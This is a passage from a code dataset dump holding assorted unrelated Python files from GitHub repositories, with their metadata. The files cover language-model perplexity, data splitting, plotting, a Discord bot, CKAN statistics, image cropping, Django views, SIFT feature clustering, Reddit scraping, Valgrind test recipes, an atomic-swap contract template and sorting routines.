per+=log_prob_kn[tuple(sentence[i:i+n])]\n else:\n per=101\n \n per/=(len(sentence) - n+1)\n per*=-1\n per = math.exp(per)\n print(per)\n all_perplexity.append(per)\n return all_perplexity\n\ndef perplexity_wb(n , tokenised_curpus ,all_probs,log_prob_wb):\n all_perplexity =[]\n for sentence in tokenised_curpus:\n per = 0\n for i in range(len(sentence)-n+1):\n if(tuple(sentence[i:i+n]) in all_probs.keys()):\n per+=log_prob_wb[tuple(sentence[i:i+n])]\n else:\n per=101\n \n per/=(len(sentence) - n+1)\n per*=-1\n per = math.exp(per)\n print(per)\n all_perplexity.append(per)\n return all_perplexity\n\n\n\n#main function\nif __name__ == \"__main__\":\n\n\n sentences , freq , tokens = tokenize(\"Corpus/Ulysses - James Joyce.txt\")\n # sentences , freq , tokens = tokenize(\"sample.txt\")\n\n log_pb ={}\n log_pb_wb ={}\n f ={}\n f_wb ={}\n\n\n \n\n gram_prob=fourgram_prob(sentences,freq,\"kn\" )\n # gram_prob_wb=fourgram_prob(sentences,freq,\"wb\" )\n\n \n # print(gram_prob(('', 'i', 'like'), 'to'))\n training_data_sentences = sentences[:int(len(sentences)*0.5)]\n \n list = []\n for sentence in training_data_sentences:\n\n #make a list of list of words\n\n words = sentence.split()\n words = [''] * 3 + words + ['']\n if words[0] == ''and words[1]=='' and words[2]=='' and words[3] == '':\n #remove empty strings\n #remove words words at inde x\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n list.append(words)\n\n if(len(sentence) == 0):\n training_data_sentences.remove(sentence)\n # continue\n words = [word for word in words if word != '']\n import math \n for i in range(len(words)-3):\n if(words[i+3] == '' or words[i+3] == ' ' or words[i+3] == None):\n words.remove(words[i+3])\n continue\n if(words[i+3] == ''):\n continue\n context = tuple(words[i:i+3])\n word = words[i+3]\n # print(context,word)\n # print(gram_prob(context,word))\n list_k = []\n for k in context:\n list_k.append(k)\n list_k.append(word)\n t_kn = gram_prob(context,word)\n # t_wb = gram_prob_wb(context,word)\n\n # print(t)\n f.update({tuple(list_k):t_kn})\n # f_wb.update({tuple(list_k):t_wb})\n log_pb.update({tuple(list_k):math.log(t_kn)})\n # log_pb_wb.update({tuple(list_k):math.log(t_wb)})\n\n \n\n # prob = {\"context\":context , \"word\":word, \"probability\":gram_prob(context ,words) }\n # print(prob)\n # all_kn_prob.append(prob)\n\n\n \n # print(f.keys())\n perplexity_kn = perplexity_kn(4,list,f,log_pb)\n # perplexity_wb = perplexity_wb(4,list,f_wb,log_pb_wb)\n # print(perplexity_kn)\n print(perplexity_wb)\n print('perplexity of the corpus for kn ', sum(perplexity_kn)/len(perplexity_kn))\n # print('perplexity of the corpus for wb ', sum(perplexity_wb)/len(perplexity_wb))\n\n # print((log_pb))\n\n\n # print(gram_prob(('', '', 'gfd'), 'gfd' ))\n\n \n","repo_name":"suyashsethia/Language_modelling","sub_path":"training_language_model/fourth.py","file_name":"fourth.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74331785853","text":"from setuptools import setup, find_packages\nfrom doku import __version__\n\n\nwith open(\"README.rst\", \"r\") as f:\n long_description = f.read()\n\nsetup(name='doku',\n version=__version__,\n packages=find_packages(),\n author=\"Balazs Nadasdi\",\n author_email=\"balazs.nadasdi@cheppers.com\",\n long_description=long_description,\n url=\"https://github.com/yitsushi/doku\",\n zip_safe=True,\n include_package_data=True,\n install_requires=['click'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n entry_points=\"\"\"\n [console_scripts]\n doku = doku.main:cli\n \"\"\")\n","repo_name":"yitsushi/doku","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"28068360445","text":"import jsonlines\n\n# This script was used to split the sent retrieval dataset into 3 sets\n# because of memory error using BERT\n\ndef split_and_save_dataset(data_file, results_files):\n\n\tdata_file = jsonlines.open(data_file, mode=\"r\")\n\tresults_file0 = jsonlines.open(results_files[0], mode=\"w\")\n\tresults_file1 = jsonlines.open(results_files[1], mode=\"w\")\n\tresults_file2 = jsonlines.open(results_files[2], mode=\"w\")\n\tcount = 0\n\n\tfor example in data_file:\n\n\t\ttmp_dict = {}\n\n\t\ttmp_dict[\"id\"] = example[\"id\"]\n\t\ttmp_dict[\"claim\"] = example[\"claim\"]\n\t\ttmp_dict[\"true_evidence\"] = example[\"true_evidence\"]\n\t\ttmp_dict[\"claim_true_label\"] = example[\"claim_true_label\"]\n\t\t# evidence = [example[\"sentence\"], example[\"line_num\"]]\n\t\ttmp_dict[\"line_num\"] = example[\"line_num\"]\n\t\ttmp_dict[\"predicted_evidence\"] = example[\"predicted_evidence\"]\n\t\ttmp_dict[\"sentence\"] = example[\"sentence\"]\n\t\ttmp_dict[\"sent_ret_label\"] = example[\"sent_ret_label\"]\n\n\t\t# if evidence in example[\"true_evidences\"]:\n\t\t# \ttmp_dict[\"sent_ret_label\"] = 1\n\t\t# else:\n\t\t# \ttmp_dict[\"sent_ret_label\"] = 0\n\n\n\t\t\n\t\tif count < 60000:\n\t\t\tprint (\"count \", count)\n\t\t\tresults_file0.write(tmp_dict)\n\n\t\telif count >= 60000 and count < 120000:\n\t\t\tresults_file1.write(tmp_dict)\n\n\t\telse:\n\t\t\tresults_file2.write(tmp_dict)\n\n\t\tcount += 1\n\n\nif __name__ == '__main__':\n\t\n\tdata_file = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/fever_full_binary_dev_sent_ret_with_evidences.jsonl\"\n\tresults_file1 = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/bert/fever_full_binary_dev_sent_ret_split1.jsonl\"\n\tresults_file2 = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/bert/fever_full_binary_dev_sent_ret_split2.jsonl\"\n\tresults_file3 = \"/home/kkuma12s/thesis/Proof_Extraction/data/fever-full/complete_pipeline/sent_ret/bert/fever_full_binary_dev_sent_ret_split3.jsonl\"\n\n\tsplit_and_save_dataset(data_file, [results_file1, results_file2, results_file3])\n","repo_name":"DeFacto/EvidenceRetrieval-ClaimClassification","sub_path":"models/DeepLearningModels/bert/split_original_set.py","file_name":"split_original_set.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"2124163236","text":"import plotly.graph_objects as go #Importação do ploty\nimport numpy as np\n\n# t = np.linspace(0,10,100) # cria espaçamento igualmente dividos 100 vezes de 0 e 10\n# y= np.sin(t)\n# fig = go.Figure(data=go.Scatter(x=t, y=y, mode=\"markers\"))\n# fig.show()\n\nnp.random.seed(1)\nN = 100\nrandom_x = np.linspace(0,1,N)\nrandom_y0 = np.random.randn(N)+5\nrandom_y1 = np.random.randn(N)\nrandom_y2 = np.random.randn(N)-5\nfig = go.Figure()\nfig.add_trace(go.Scatter(x=random_x, y=random_y0, mode='markers', name = 'markers'))\nfig.add_trace(go.Scatter(x=random_x, y=random_y1, mode='lines+markers', name = 'lines+markers'))\nfig.add_trace(go.Scatter(x=random_x, y=random_y2, mode='lines', name = 'lines'))\nfig.write_html('grafico plotly.html')\nfig.show()","repo_name":"ThiagoMargoni/Senai-University-Files","sub_path":"2023.2/Big Data e IA/Plotly/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38042673439","text":"import disnake\nfrom disnake.ext import commands\n\nclass ServerIcon(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.slash_command()\n async def servericon(self, inter: disnake.ApplicationCommandInteraction):\n \"\"\"Get that juicy profile picture of a server\"\"\"\n embed1 = disnake.Embed()\n embed1.set_image(inter.guild.icon.url)\n await inter.response.send_message(embed=embed1)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ServerIcon(bot))","repo_name":"ShinWasTaken/casprys-maid-discordbot","sub_path":"cogs/general/servericon.py","file_name":"servericon.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71461742013","text":"# encoding: utf-8\n\"\"\"Contains the controller for KPI page.\"\"\"\n\nimport ckan.plugins as p\nfrom ckan.lib.base import BaseController\nimport stats as stats_lib\nimport ckan.lib.helpers as h\n\nfrom ckanext.kpis.plugin import show_graphs\nfrom ckanext.kpis.plugin import kpi_goals\nfrom ckanext.kpis.stats import first_date\nfrom ckanext.kpis.stats import DATE_FORMAT\n\nDUMMY_DATE = h.date_str_to_datetime(first_date.strftime(DATE_FORMAT))\n\n\nclass StatsController(BaseController):\n \"\"\"Controller for KPI pages.\"\"\"\n\n def index(self):\n \"\"\"Render the KPI index page.\"\"\"\n c = p.toolkit.c\n\n c.show_graphs = show_graphs\n c.kpi_goals = kpi_goals\n\n usage_stats = stats_lib.UsageStats()\n\n monthly_users = usage_stats.get_monthly_user_counts('all')\n c.num_users_by_month = [\n {\n 'date': h.date_str_to_datetime(month_date),\n 'users': users,\n 'percent_complete': percentage\n }\n for month_date, users, percentage in monthly_users\n ]\n if not c.num_users_by_month:\n c.num_users_by_month = [\n {\n 'date': DUMMY_DATE,\n 'users': 0,\n 'percent_complete': 0\n }\n ]\n\n weekly_datasets = usage_stats.get_dataset_counts('dataset')\n c.raw_packages_by_week = [\n {\n 'date': h.date_str_to_datetime(week_date),\n 'total_packages': cumulative_num_hits,\n 'percent_complete': percentage\n }\n for week_date, cumulative_num_hits, percentage in weekly_datasets\n ]\n if not c.raw_packages_by_week:\n c.raw_packages_by_week = [\n {\n 'date': DUMMY_DATE,\n 'total_packages': 0,\n 'percent_complete': 0\n }\n ]\n\n weekly_harvesters = usage_stats.get_dataset_counts('harvest')\n c.raw_harvesters_by_week = [\n {\n 'date': h.date_str_to_datetime(week_date),\n 'total_packages': sources,\n 'percent_complete': percentage\n }\n for week_date, sources, percentage in weekly_harvesters\n ]\n if not c.raw_harvesters_by_week:\n c.raw_harvesters_by_week = [\n {\n 'date': DUMMY_DATE,\n 'total_packages': 0,\n 'percent_complete': 0\n }\n ]\n\n return p.toolkit.render('ckanext/kpis/index.html')\n","repo_name":"NextGeoss/ckanext-kpis","sub_path":"ckanext/kpis/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41134879550","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countSort function below.\ndef countSort(arr):\n arrlen=len(arr)\n firsthalf=int(arrlen/2)\n countingArray=list()\n j=0\n for i in range(0,100):\n countingArray.append(list())\n for i in arr:\n index=int(i[0])\n element=None\n if(j -500] = 1\n mask_arr[mask_arr <= -500] = 0\n mask_arr[mask_arr >= -500] = 1 \n #print('mask_arr min and max:', np.amin(mask_arr), np.amax(mask_arr))\n centermass = ndimage.measurements.center_of_mass(mask_arr) # z,x,y \n cpoint = c - crop_shape[2]//2\n #print('cpoint, ', cpoint)\n centermass = ndimage.measurements.center_of_mass(mask_arr[cpoint, :, :]) \n #print('center of mass: ', centermass)\n startx = int(centermass[0] - crop_shape[0]//2)\n starty = int(centermass[1] - crop_shape[1]//2) \n #startx = x//2 - crop_shape[0]//2 \n #starty = y//2 - crop_shape[1]//2\n startz = int(c - crop_shape[2])\n #print('start X, Y, Z: ', startx, starty, startz)\n # cut bottom slices\n #image_arr = image_arr[30:, :, :]\n #label_arr = label_arr[30:, :, :]\n if startz < 0:\n img_arr = np.pad(\n img_arr,\n ((abs(startz)//2, abs(startz)//2), (0, 0), (0, 0)), \n 'constant', \n constant_values=-1024)\n seg_arr = np.pad(\n seg_arr,\n ((abs(startz)//2, abs(startz)//2), (0, 0), (0, 0)), \n 'constant', \n constant_values=0)\n img_arr_crop = img_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n seg_arr_crop = seg_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n else:\n img_arr_crop = img_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n seg_arr_crop = seg_arr[0:crop_shape[2], starty:starty+crop_shape[1], startx:startx+crop_shape[0]]\n # save nii\n print(img_arr_crop.shape)\n print(seg_arr_crop.shape)\n img_fn = img_crop_dir + '/' + img_id\n img = nib.Nifti1Image(img_arr_crop, np.eye(4))\n nib.save(img, img_fn)\n seg_fn = seg_crop_dir + '/' + seg_id\n seg = nib.Nifti1Image(seg_arr_crop, np.eye(4))\n nib.save(seg, seg_fn)\n\n\nif __name__ == '__main__':\n\n proj_dir = '/mnt/aertslab/USERS/Zezhong/hecktor2022/DATA2/nnUNet_raw_data_base/nnUNet_raw_data/Task500_ToySet'\n crop(proj_dir)\n\n\n \n","repo_name":"xmuyzz/HeadNeckCancer-Outcome","sub_path":"data_curation/hecktor_crop.py","file_name":"hecktor_crop.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"15964920704","text":"from django.shortcuts import render, HttpResponse\n\n# Create your views here.\nfrom products.models import Products\n\n\ndef hello_world(request):\n return HttpResponse(\"Hello World\")\n\n\ndef hello_world_name(request, name):\n return HttpResponse(\"Hello World \" + name)\n\n\ndef product_list(request):\n products = Products.objects.all()\n\n return render(\n request=request,\n context={'products': products},\n template_name='products_list.html'\n )\n\n # output = \"\"\n # for product in products:\n # output += f'{product.id} | {product.name}
'\n # return HttpResponse(output)\n\n\ndef product_details(request, id):\n product = Products.objects.get(pk=id)\n output = f\"Product: {product.id}

\"\n output += f\"Name: {product.name}
\"\n output += f\"Description: {product.description}
\"\n output += f\"Is available: {product.is_available}
\"\n\n return HttpResponse(output)\n","repo_name":"megilegi/python_bootcamp","sub_path":"zjazd_5/web/exercises/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5555069870","text":"#!/usr/bin/env python3\nfrom evolve_bf.evolve import *\n\nif __name__ == \"__main__\":\n\n cost_options = cost.default_cost_options._replace(ascii_only=True)\n\n evolve_options = default_evolve_options._replace(cost_options=cost_options, verbose=True)\n # Using _replace allows us to set only the values we actually care about.\n\n results = supervised_evolve(['Hello, world!', 'Flump.'], ['Hello, world!', 'Flump.'], evolve_options)\n\n results = supervised_evolve(['ABCDEFGHIJKLMNOPQRSTUVWXYZ'], ['abcdefghijklmnopqrstuvwxyz'], evolve_options)\n","repo_name":"NoraCodes/evolve_bf","sub_path":"test_evolve.py","file_name":"test_evolve.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36667811618","text":"from multiprocessing import Process,Manager,Pool\nimport numpy as np\nimport constants\nimport random\nimport time\nimport cv2\n\nclass sift:\n \n siftSize=50 # no of clusters\n siftLimit=2000 \n surfLimit=1000 # no of interest points in each image\n # we will need to classify siftSize * no of images\n vetorSize=128\n epochs=100 # 200\n radiousS=siftSize\n radiousE=0 \n learningRateS=0.9\n learningRateE=0.015\n s=5 # Stepness factor.\n manager=Manager()\n processesNo=5;\n \n \n def getFeatureVector(classifiedSift,imageSift,training=True,image=None):\n if training==False:\n imageSift=sift.extractTheSift(image)\n featureVector=sift.matchTheSiftToCalcPDF(classifiedSift,imageSift)\n return featureVector\n \n def getFeatureVectorProcess(featureVectors,classifiedSift,imageSift,index):\n featureVectors[index]=sift.matchTheSiftToCalcPDF(classifiedSift,imageSift)\n \n \n def matchTheSiftToCalcPDF(classifiedSift,allSift):\n if len(allSift) == 0:\n return []\n imagePDF=[0 for i in range(sift.siftSize)] \n for i in range(len(allSift)):\n siftMinIndex=sift.getTheIndexOfMinVectorDiff(classifiedSift,allSift[i])\n imagePDF[siftMinIndex]+=(1/len(allSift)) # TODO: Be sure from the devision.\n return imagePDF\n \n \n def extractTheSift(image):\n imageSift=[] \n if constants.siftOrserf==\"sift\":\n siift = cv2.xfeatures2d.SIFT_create(sift.siftLimit)\n (kps,imageSift) = siift.detectAndCompute(image, None)\n imageSift/=255\n print(\"# kps: {}, descriptors: {}\".format(len(kps), imageSift.shape))\n else:\n surf = cv2.xfeatures2d.SURF_create(sift.surfLimit)\n kps,imageSift = surf.detectAndCompute(image,None)\n return imageSift\n \n \n def extractTheSiftAllImages(trainingDataImages):\n allSift=[]\n imagesSift=[[] for i in range(len(trainingDataImages))]\n for i in range(len(trainingDataImages)):\n imagesSift[i]=sift.extractTheSift(trainingDataImages[i])\n if i==0:\n allSift=imagesSift[i]\n else:\n allSift=np.vstack(( allSift,imagesSift[i]))\n return allSift,imagesSift\n \n def classifyTheSiftUsingKmean(trainingDataImages):\n start=time.time()\n allSift,imagesSift=sift.extractTheSiftAllImages(trainingDataImages)\n print(\"len of allSift \"+str(len(allSift))+\" time \"+str(time.time()-start))\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n ret,label,center=cv2.kmeans(allSift,sift.siftSize,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)\n classifiedSift= center\n return classifiedSift,imagesSift\n \n def classifyTheSiftUsingKohenenMap(trainingDataImages):\n start=time.time()\n allSift,imagesSift=sift.extractTheSiftAllImages(trainingDataImages)\n print(\"len of allSift \"+str(len(allSift))+\" time \"+str(time.time()-start))\n # Run the kohenen self organizing map algorithm.\n classifiedSift=[]\n if constants.siftOrserf==\"sift\":\n classifiedSift=[[random.uniform(0, 1) for j in range(sift.vetorSize)] for i in range(sift.siftSize)]\n else:\n classifiedSift=[[random.uniform(-1, 1) for j in range(sift.vetorSize)] for i in range(sift.siftSize)]\n radious=sift.radiousS\n rate=sift.learningRateS\n for k in range(sift.epochs):\n alpha=[False for i in range(sift.siftSize)]\n randomIndexArr = np.random.choice(len(allSift), 1,replace=False)\n randomIndex=randomIndexArr[0]\n randomInput=allSift[randomIndex]\n nearestContorIndex=sift.getTheIndexOfMinVectorDiff(classifiedSift,randomInput)\n sift.updateAlpha(alpha,radious,nearestContorIndex)\n sift.updateWeights(classifiedSift,alpha,rate,randomInput)\n radious,rate=sift.updateTrainingParamters(k+1)\n return classifiedSift,imagesSift\n \n \n \n def updateAlpha(alpha,radious,index):\n minRange=max(index-round(radious),0)\n maxRange=min(index+round(radious),len(alpha))\n for i in range(minRange,maxRange,1):\n alpha[i]=True\n \n def updateTrainingParamters(k):\n newRadious=pow((pow(sift.radiousE,(1/sift.s))-pow(sift.radiousS,(1/sift.s)))*(k/sift.epochs)+pow(sift.radiousS,(1/sift.s)),sift.s)\n newRate=pow((pow(sift.learningRateE,(1/sift.s))-pow(sift.learningRateS,(1/sift.s)))*(k/sift.epochs)+pow(sift.learningRateS,(1/sift.s)),sift.s)\n return newRadious,newRate\n \n def updateWeights(classifiedSift,alpha,rate,randomInput):\n for i in range(sift.siftSize):\n difference=[np.subtract(randomInput[j],classifiedSift[i][j]) for j in range(len(randomInput))]\n classifiedSift[i]=[np.add(classifiedSift[i][j],rate*alpha[i]*difference[j]) for j in range(len(difference))]\n \n def getFeatureVectors(trainingDataImages):\n start = time.time()\n classifiedSift=[]\n imagesSift=[]\n if constants.clusteringMethod==\"kohenent\": \n classifiedSift,imagesSift=sift.classifyTheSiftUsingKohenenMap(trainingDataImages)\n else:\n classifiedSift,imagesSift=sift.classifyTheSiftUsingKmean(trainingDataImages)\n print(\"Time taken to excute the kohenent = \"+str(time.time() - start))\n # Initialize the vectors of each image with empty vector.\n start2 = time.time() \n featureVectors=sift.manager.list([[] for i in range(len(trainingDataImages))])\n processes = [sift.createProcess(classifiedSift,imagesSift[i],i,featureVectors) for i in range(len(trainingDataImages))]\n for p in processes:\n p[0].start()\n for p in processes:\n p[0].join()\n print(\"thread index = \"+str(p[1]),str(len(featureVectors[p[1]])))\n p[0].terminate()\n featureVectorsTemp=featureVectors\n del featureVectors\n print(\"Time taken to excute the featureVectors loop = \"+str(time.time() - start2))\n return classifiedSift,featureVectorsTemp\n \n def createProcess(classifiedSift,imageSift,index,featureVectors):\n process = Process(target=sift.getFeatureVectorProcess, args=(featureVectors,classifiedSift,imageSift,index))\n return (process ,index)\n \n\n\n def getTheIndexOfMinVectorDiff(allVectors,vector):\n minIndex=-1\n minDist=10000000\n for i in range(len(allVectors)):\n totalDist=sum([abs(allVectors[i][j]-vector[j]) for j in range(len(vector))])\n if totalDist 9\n exp_risk[to_wrap] = (exp_risk[to_wrap] % 10) + 1\n\n return exp_risk\n\n\ndef neighbors(index, max_i):\n row, column = index\n pot_n = [(row, column + 1),\n (row, column - 1),\n (row + 1, column),\n (row - 1, column)]\n return [i for i in pot_n if max(i) < max_i and min(i) >= 0]\n\n\ndef lowest_risk_dijkstra(f, n_expand=1, use_heuristics=False):\n risk = read_map(f)\n if n_expand > 1:\n risk = expand(risk, n_expand)\n\n max_i = risk.shape[0]\n a = np.arange(max_i)\n b = np.zeros_like(risk)\n for i in range(max_i):\n b[i] = a + i\n b[i, 0] = i\n heuristic_distance = np.flip(b)\n\n distance = np.full_like(risk, np.inf)\n distance[0, 0] = 0\n\n # mark initial node as current\n current = (0, 0)\n open_set = [current]\n\n while True:\n # loop through unvisited neighbors\n for n in neighbors(current, max_i=max_i):\n # set new distance value if lower than previous\n new_distance = distance[current] + risk[n]\n if new_distance < distance[n]:\n distance[n] = new_distance\n if n not in open_set:\n open_set.append(n)\n\n # set current node to visited\n open_set.remove(current)\n if not open_set:\n break\n\n # choose new current node according to distance\n if use_heuristics:\n distances_open_set = [distance[i] + heuristic_distance[i] for i in open_set]\n else:\n distances_open_set = [distance[i] for i in open_set]\n\n current = open_set[np.argmin(distances_open_set)]\n print(current)\n\n return distance[-1, -1]\n\n\nif __name__ == '__main__':\n # lowest = lowest_risk_dijkstra('input.txt', use_heuristics=True)\n lowest_exp = lowest_risk_dijkstra('input.txt', n_expand=5, use_heuristics=False)\n\n # print(f'Lowest total risk: {lowest}')\n print(f'Lowest total risk after expansion: {lowest_exp}')\n","repo_name":"qku/advent-of-code","sub_path":"src/advent_of_code/2021/15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70147956414","text":"import json\nimport requests\nimport datetime as dt\nimport re\nimport csv\n\nMONTHS = range(1, 13)\nYEARS = range(2014,2022)\nSUBREDDIT = \"showerthoughts\"\nENDPOINT=\"https://api.pushshift.io/reddit/search/submission/\"\n\ntimestamps=[]\n\nfor year in YEARS:\n for month in MONTHS:\n after_timestamp = dt.datetime(year, month, 1).timestamp()\n\n if month==12:\n before_timestamp = dt.datetime(year+1, 1, 1).timestamp()\n else:\n before_timestamp = dt.datetime(year, month+1, 1).timestamp()\n\n timestamps.append((int(after_timestamp), int(before_timestamp)))\n\nshower_thoughts=[]\n\nfor after, before in timestamps:\n payload = {\n 'subreddit':SUBREDDIT, \n 'sort_type':'score',\n 'fields':('title', 'selftext'),\n 'after':after,\n 'before':before\n }\n response = requests.get(ENDPOINT, params=payload)\n print(f\"getting posts from {dt.datetime.fromtimestamp(after)} to {dt.datetime.fromtimestamp(before)}\")\n for post in response.json()['data']:\n try:\n title=post['title']\n text=post['selftext']\n except: continue\n shower_thought=re.sub(\"\\[.*?\\]\",'',f\"{title} {text}\")\n shower_thoughts.append([shower_thought])\n\nwith open('showerthoughts.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow([\"showerthoughts\"])\n writer.writerows(shower_thoughts)\n\nprint(\"All Done!\")","repo_name":"daspartho/shower-thought","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12303537549","text":"from .. import graph, using, style\nfrom flask_babel import gettext as _l\nimport pygal\n\n\n@graph(_l('Browser'))\n@using('account_activity')\ndef device_usage(data):\n acc_act = data['account_activity']\n browser = acc_act.browser.value_counts()\n browser = browser / browser.sum() * 100\n browser = browser.round(2)\n\n pie_chart = pygal.Pie(style=style, inner_radius=.4)\n for os, count in zip(browser.index, browser):\n pie_chart.add(os, count)\n\n return pie_chart\n\n return chart\n","repo_name":"klima7/Social-Insight","sub_path":"analytics/administration/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18226129463","text":"import sys\nsys.stdin = open(\"input.txt\",\"r\")\n\nTC=int(input())\nfor num in range(1,TC+1):\n n=int(input())\n mp=[list(input().split()) for _ in range(n)]\n print(f'#{num}')\n for i in range(n):\n oneline1=\"\"\n oneline2=\"\"\n oneline3=\"\"\n for j in range(n):\n oneline1+=mp[n-1-j][i] # 90도 회전\n oneline2+=mp[n-1-i][n-1-j] # 180도 회전\n oneline3+=mp[j][n-1-i] # 270도 회전\n print(f'{oneline1} {oneline2} {oneline3}')","repo_name":"HorangApple/TIL","sub_path":"Algorithm/SWEA/13일차/190227 - 숫자 배열 회전.py","file_name":"190227 - 숫자 배열 회전.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21127407359","text":"from . import default\n\n\n\"\"\"Valgrind flavor, used for running code through Valgrind.\"\"\"\n\n\nclass ValgrindFlavor(default.DefaultFlavor):\n def __init__(self, m, app_name):\n super(ValgrindFlavor, self).__init__(m, app_name)\n self._suppressions_file = self.m.path['start_dir'].join(\n 'skia', 'tools', 'valgrind.supp')\n self._valgrind_cipd_dir = self.m.vars.workdir.join('valgrind')\n self._valgrind_fake_dir = self._valgrind_cipd_dir\n self._valgrind = self._valgrind_fake_dir.join('bin', 'valgrind')\n self._lib_dir = self._valgrind_fake_dir.join('lib', 'valgrind')\n\n def step(self, name, cmd, **kwargs):\n new_cmd = [self._valgrind, '--gen-suppressions=all', '--leak-check=full',\n '--track-origins=yes', '--error-exitcode=1', '--num-callers=40',\n '--suppressions=%s' % self._suppressions_file]\n path_to_app = self.host_dirs.bin_dir.join(cmd[0])\n new_cmd.append(path_to_app)\n new_cmd.extend(cmd[1:])\n with self.m.env({'VALGRIND_LIB': self._lib_dir}):\n return self.m.run(self.m.step, name, cmd=new_cmd, **kwargs)\n","repo_name":"google/skia","sub_path":"infra/bots/recipe_modules/flavor/valgrind.py","file_name":"valgrind.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":8112,"dataset":"github-code","pt":"81"} +{"seq_id":"12951569304","text":"import sys\nfrom string import Template\n\n\nDEFAULT_TOKEN_ID_HEX = \"487291c237b68dd2ab213be6b5d1174666074a5afab772b600ea14e8285affab\"\n\n\nCONTRACT = Template(\"\"\"\n contract (state: State, tx: Transaction, secret: Array[Byte]) = {\n let secretHash = hex\"$secret_hash_hex\"\n let participantAddress = base58\"$participant_address\"\n let tokenId = hex\"$token_id_hex\"\n let amount = $amount\n let redemptionDeadline = $redemption_deadline // Timestamp\n sha256(secret) == secretHash && tx.outputs.exists(lamb (bx: Box) = if (let assetBx: AssetBox = bx) {\n assetBx.tokenId == tokenId &&\n assetBx.contractHash == participantAddress &&\n assetBx.amount >= amount\n } else false) || (sha256(secret) == secretHash && state.lastBlockTimestamp > redemptionDeadline)\n }\n \"\"\")\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if (len(args) >= 4):\n secret_hash_hex = args[0]\n participant_address_hex = args[1]\n amount = args[2]\n redemption_deadline = args[3]\n \n try:\n token_id_hex = args[4]\n except IndexError:\n token_id_hex = DEFAULT_TOKEN_ID_HEX\n \n print(CONTRACT.substitute({\n \"secret_hash_hex\" : secret_hash_hex,\n \"participant_address\" : participant_address,\n \"amount\" : amount,\n \"redemption_deadline\" : redemption_deadline,\n \"token_id_hex\" : token_id_hex\n }))\n else:\n print(\"Usage: atomic_swap_contract.py [OPTIONAL]\")\n sys.exit()\n\n\n","repo_name":"EncryFoundation/EncryUseCases","sub_path":"atomic_swap/utils/atomic_swap_contract.py","file_name":"atomic_swap_contract.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42607280797","text":"# coding=utf-8\n\nfrom scapy.all import send\n\n\nclass EasyPacket(object):\n def __init__(self, packet, protocol, dst_mac, src_mac, dst_ip, src_ip, dport=None, sport=None):\n self.packet = packet\n self.protocol = protocol\n\n self.dst_mac = dst_mac\n self.src_mac = src_mac\n\n self.dst_ip = dst_ip\n self.src_ip = src_ip\n\n self.dport = dport\n self.sport = sport\n\n def _send_packet(self):\n send(self.packet)\n\n\n\n","repo_name":"xrtdkr/tcpProj","sub_path":"eazy_packet.py","file_name":"eazy_packet.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39717720364","text":"def heap_sort(lst):\n def sift_down(start, end):\n \"\"\"最大堆调整\"\"\"\n root = start\n while True:\n child = 2 * root + 1\n if child > end: # 没有孩子\n break\n if child + 1 <= end and lst[child] < 